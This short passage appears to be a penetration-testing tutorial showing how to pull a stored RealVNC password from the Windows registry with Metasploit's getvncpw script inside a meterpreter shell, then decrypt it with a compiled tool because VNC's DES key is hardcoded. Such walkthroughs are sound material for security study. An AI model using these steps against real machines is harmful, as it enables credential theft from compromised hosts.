inside your meterpreter shell run getvncpw
meterpreter > run getvncpw
[*] Searching for VNC Passwords in the registry....
[*] FOUND in HKLM\Software\RealVNC\WinVNC -=> ebbf =>
you're probably asking yourself what the F kind of password e... is. Well its DES encrypted. Lucky for us the key is hardcoded (x) and since VNC is open source...
change the relevant section
/* put your password hash here in p */
getvncpw spit out: ebbf
cg@segfault:~/pentest$ gcc vncdec.c -o vncdec
or use this one
where you can just put your hash on the command line and don't have to recompile every time.